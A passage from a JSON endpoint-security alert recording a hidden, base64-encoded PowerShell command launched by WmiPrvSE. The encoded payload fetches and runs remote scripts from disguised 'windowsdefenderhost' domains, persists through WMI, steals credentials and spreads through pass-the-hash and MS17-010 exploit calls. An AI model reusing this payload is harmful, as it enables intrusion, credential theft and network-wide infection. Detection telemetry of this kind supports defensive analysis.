ZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating 